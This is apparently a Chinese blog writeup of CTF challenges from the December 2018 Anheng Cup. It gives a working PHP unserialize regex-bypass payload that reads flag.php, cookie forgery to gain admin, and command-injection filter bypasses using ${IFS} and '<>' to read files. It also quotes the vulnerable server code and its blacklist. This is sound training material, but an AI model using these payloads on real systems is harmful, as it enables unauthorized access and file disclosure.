2018安恒杯12月月赛复现

最新推荐文章于 2021-03-24 21:05:02 发布
最新推荐文章于 2021-03-24 21:05:02 发布
阅读量1k 收藏
点赞数
分类专栏: Writeup 文章标签: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gar_denia/article/details/88080370
版权

前言

萌新因为种种原因没有做安恒12月的月赛题,正巧这几天发现复现,又学到了新知识!

正文

Web

easy

题目index.php给出源码:

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches);
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

这题一开始没看懂到底是啥意思,一开始定义了一个baby类,然后在下面完全没有用到有关这个类的任何东西,所以身为萌新的我一脸蒙圈…后来经过仔细地阅读代码,大量的查阅资料,现了其中的猫腻…

分析:

  1. 代码一开始包含文件flag.php
  2. 然后定义了一个类,类成员变量$file,重写__toString()方法,这个方法就是将以$filename为文件名的文件输出;
  3. 接着对data进行正则匹配preg_match('/[oc]:\d+:/i',$data,$matches),匹配结果放入$matches,匹配成功就die('Hacker!'),不成功就对输入的$data进行反序列化并输出;

解题方法:

其实这个题理解了以后就不难了,目标是输出flag.php的内容,所以构造的data肯定也与包含的文件名相关;

先对flag.php进行序列化并输出,脚本如下:

<?php
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
$a=new baby();
$a->file='flag.php';
$b=serialize($a);
echo($b);
?>

***测试结果输出:***O:4:"baby":1:{s:4:"file";s:8:"flag.php";}直接GET这个值会匹配正则表达式,所以就要想办法绕过;

绕过方法:该函数设计的初衷是为了不让Object类型被反序列化,然而正则不够严谨,我们可以在对象长度前加一个+号,即O:4 -> O:+4,即可绕过这层检测,从而使得我们可控的数据传入unserialize函数;

构造如下:O:+4:"baby":1:{s:4:"file";s:8:"flag.php";}

将这个字符传入unserialize函数以后会直接反序列化出一个baby的对象$good$good->fileflag.php,反序列化后会直接默认调用魔术方法__toString()输出文件内容;

所以归根结底还是一个正则绕过+反序列化的问题,将构造的data经过URL编码以后GET进去即可得到flag;(不知道为啥直接在浏览器里传参没用,所以就用bp构造GET了一下)

payload:?data=O%3A%2b4%3A%22baby%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

kCMhtS.png

反序列化漏洞参考链接:

https://www.freebuf.com/articles/web/167721.html

https://xz.aliyun.com/t/3017

https://paper.seebug.org/39/

easyweb2

这题拿到以后没有切入点…老办法…扫一波目录,发现admin.phpconfig.php

kCJwDJ.png

进入admin.php发现You are not admin…,基本定下思路就是伪造管理员身份登录,查看请求头中的信息发现cookie的user=dXNlcg%3D%3D推测为base64编码,解码为user

kCJIUI.png

要求以管理员身份登录,于是伪造useradmin,base64编码一下修改cookie的值为YWRtaW4=;刷新网页后发现进入了如下界面;

kCYCGV.png

输入ls发现回显;

kCYeaR.png

输入ls /想查看根目录报错error,输入cat admin.php报错,设想是过滤了空格,Google了一下空格的绕过方式如下:IFS的默认值为:空白(包括:空格,tab, 和新行)

kCtlYq.md.png

${IFS}尝试绕过,输入ls${IFS}/,发现回显中有flag信息:

kCto1f.png

直接cat${IFS}/ffLAG_404得到flag:

kCtbng.png

事后想查看admin.php和config.php的内容,发现${IFS}无效,于是尝试<>成功,直接cat<>admin.php和config.php即可;

admin.php

<?php
include 'config.php';
if (!isset($_SESSION['admin'])||$_SESSION['admin']===false) {
	die("You are not admin...");
}
if (@$_POST['cmd']) {
	$cmd = waf_exec($_POST['cmd']);
	$retval = array();
	exec($cmd, $retval, $status);
	// var_dump($retval);
	if ($status == 0) {
		$res = implode("\n",$retval);
	}else{
		$res = 'error';
	}
}else{
	$res = '';
}

include './templates/admin.html';

config.php

<?php
session_start();

function waf_exec($str){
	$black_str = "/(;|&|>|}|{|%|#|!|\?|@|\+| )/i";
		$str = preg_replace($black_str, "",$str);
		return $str;
	}

发现确实用waf_exec()函数过滤了空格,>,{,}等一系列符号,但是没有过滤< / $,所以可以直接用<和$IFS绕过即可;

参考链接:cookie欺骗命令执行的绕过技巧

MISC

juju

拿到图片丢进16进制编辑器,查找flag无果,发现是png图片就查看一下文件头,发现貌似没什么问题,看到图片的高度和长度不一样,于是都改成04,图片的下一截显现出来:

kCN7P1.png

得到的编码为base32,直接解码md5一下即可

kCNfrF.png

Gard3nia
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021­-1732 windows 10本地提权漏洞复现
afei001
04-01 452
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞原理 5.漏洞复现 5.1 Visual Studio生成exe 5.2 g++编译.cpp生成exe 5.3 exploit利用 6.漏洞修复 1.漏洞概述 早在2020年12中旬,安恒威胁情报中心猎影实验室发布了《蔓灵花(BITTER)组织近期针对我国政府部门、科研机构发起攻击》,并且文中已经给出并分析了该组织攻击的一些组件。在后续的跟进分析中又发现了一个全新的组件,经过分析发现该组件利用了一个未知的W...
安恒201812wp web部分
南天_princess的博客
12-22 745
好久没有打过ctf,正好周末有时间,打了一波安恒的感觉挺基础的,比较适合像我这样的萌新,这次记录一下解题的过程。做得时候没有截图,最后想写的时候就剩一点没关的页面可以截几个图 web1 题目地址:http://101.71.29.5:10000 题目打开看着是一个网站,按照常规的思路先御剑扫描,发现存在admin.php、存在.DS_Store文件,存在文件泄露,ds_store_exp 是一...
安恒-201812
wyj_1216 House
12-23 1168
签到题 没啥好说的,什么牛不能跑?蜗牛 ezweb2 题目: http://101.71.29.5:10000/index.php 解题思路: 拿到题目后,扫了一波: python3 dirsearch.py -u http://101.71.29.5:10000 -e php 发现:admin.php 进入查看,显示无法进入 查看页面信息,发现user登录信息,在存储值可更改。 将其先进行...
安恒9部分复现记录
0verWatch的博客
09-30 1933
前言 赶紧趁着电脑的屏幕修好了,刚好安恒的web题目有复现,赶紧做。。。。。又从这几个题目里面学习到新知识了小结一下 正文 web babybypass 这个题目我记得我当初做的时候是一直考虑着用$以及_去绕过这些数字字母之类的东西,突然发现他这个题目里面把那个$以及_也经过了过滤,这样的话就少了很多可能性,而且这题比原题的限制长度小了,更有难度。现在就开始总结一下从这个题目学到的知识点 1.ph...
CTF-安恒18年十二部分writeup
weixin_34255055的博客
12-22 727
CTF-安恒十二部分writeup 这次题目都比较简单蛤,连我这菜鸡都能做几道。 WEB1-ezweb2 打开网站,啥也没有,审计源代码,还是啥都没有,也没什么功能菜单,扫了一下目录,扫到了admin.php,但是提示:你不是管理员。好吧,抓个包看看 解一下码--: 将user改为admin,发现直接跳转到了admin.php页面。 这个框试了一下是可以执行命...
安恒 6 简单的日志分析、又是crackme和你认识我吗?
A_dmin的博客
06-29 1660
安恒 6 简单的日志分析、又是crackme和你认识我吗? 一天一道CTF题目,能多不能少 0x001 Misc 简单的日志分析 题目链接: 链接:https://pan.baidu.com/s/1xxiCe_oTRcoIN-eFEfmTSg 提取码:7j26 复制这段内容后打开百度网盘手机App,操作更方便哦 解压打开,日志文件分析,发现是对一个网站的盲注的日志, 然后就开始寻找flag,...
2018安恒杯11-Web writeup
CoolD's Blog
11-28 3027
心态炸了
安恒php_DASCTF6
weixin_40007541的博客
12-21 299
因为和第五空间连着,然后昨天下午又去打了一场AWD,感觉身体掏空,就认真打了DASCTF(咕咕咕),剩下的题目等有机会再复现简单的计算器-1考点:python eval()代码注入,命令执行结果外带访问Source可以看到源码:#!/usr/bin/env python3# -*- coding: utf-8 -*-from flask import Flask, render_template,...
安恒12Web题解
0verWatch的博客
12-22 2903
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
DASCTF&BJDCTF 3rd 三道PWN题复现
weixin_44145820的博客
06-21 900
最近看了一下上次安恒五没做出的几道PWN题,感觉自己水平还是不够,还要多学习 easybabystack(格式化字符串*, ret2csu) 这题有个栈溢出漏洞 但是必须输入正确的密码,否则就直接退出了 还有个格式化字符串漏洞 字符串长度为12 由于密码是/dev/urandom生成的,无法预测。 这里需要利用格式化字符串漏洞的’*'号 %*num$d从栈中取变量作为N 比如num$处的值是0x100,那么这个格式化字符串就相当于%256d 而密码位于18$的位置,我们使用%*18$c就可以打
ctf系列——反序列化漏洞
超级无敌菜阿板的博客
05-26 4666
题目 http://123.206.87.240:8006/test1/ 拿到题之后先看源码 you are not the number of bugku ! <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&a...
攻防世界 Bug
CyhDl666的博客
02-24 975
进入界面随便注册一个root账号 点击Manage 页面返回Sorry,You are not admin! 需要用 admin账号 注册发现该账号已经被注册过了 发现有一个Findpwd界面 可以重置密码 问题来了 我不知道admin账号的生日和地址 先尝试一下改自己前面申请的root账号 改一下密码试试 这里要一直抓包 改掉username为admin尝试了一下 依然是成功的 所以这里admin的账号的密码就被改了 用admin登录 进入manage界面有提示IP NOT allowed burp.
BUUCTF [HCTF 2018] admin
Senimo
12-10 1044
BUUCTF [HCTF 2018] admin解法一:弱密码解法二:Flask伪造Session解法三:Unicode欺骗 考点: 弱密码 Flask伪造session Unicode欺骗 启动环境: 简洁的页面和一个菜单栏,菜单栏中包含登陆、注册功能 查看网页源码,发现提示: <!-- you are not admin --> 提示需要用admin用户登陆 解法一:弱密码 尝试使用admin登陆,密码123: 登陆成功,可以得到flag 首先注册正常的账户: test test
BUUCTF web admin (flask_session问题)
H4ppyD0g的博客
02-23 1417
检查源码,发现有注释<!-- you are not admin -->,应该是提示用admin账号登录。 两个功能,注册和登录,想到之前做过一个注册admin加空格的题,试了一下不成功。 然后老老实实注册一个普通用户 显示了自己的用户名,我们的目的因该是让自己的用户名变成admin才行。 change password只能修改自己账号的密码,没有漏洞。 post可能有xss漏洞,交...
mysql注入ctf_CG-CTF SQL注入
weixin_35618196的博客
01-20 463
SQL注入1题目访问题目网址先查看一下源码仔细分析一下核心源码if($_POST[user] && $_POST[pass]) { //判断user和pass两个变量不为空mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); //连接数据库m...
bugku(代码审计 wp)
Xi4or0uji
09-02 1723
extract变量覆盖 源码 &lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)){ $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; } else{ ech...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
CTF/CTF练习平台-welcome to bugkuctf【php://filter及php://input】
Sp4rkW的博客
09-01 3万+
原题内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($...
php三条连接一起访问,3CTF题目详解(上)
weixin_31741827的博客
03-24 437
3CTF已经落下帷幕,题目类型包括理论题和CTF夺旗,CTF夺旗主要涉及Web安全、数据包分析、取证分析、隐写、加解密编码等内容;目前wp已出炉,让我们一起围观~题目1:立誓要成为admin的男人题目类型:SQL注入解题思路:1.注册test用户,然后登陆,得到提示you are not admin2.回头看看,在登录处发现SQL盲注漏洞3.注出了user表的数据但是admin的密码没法解密。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值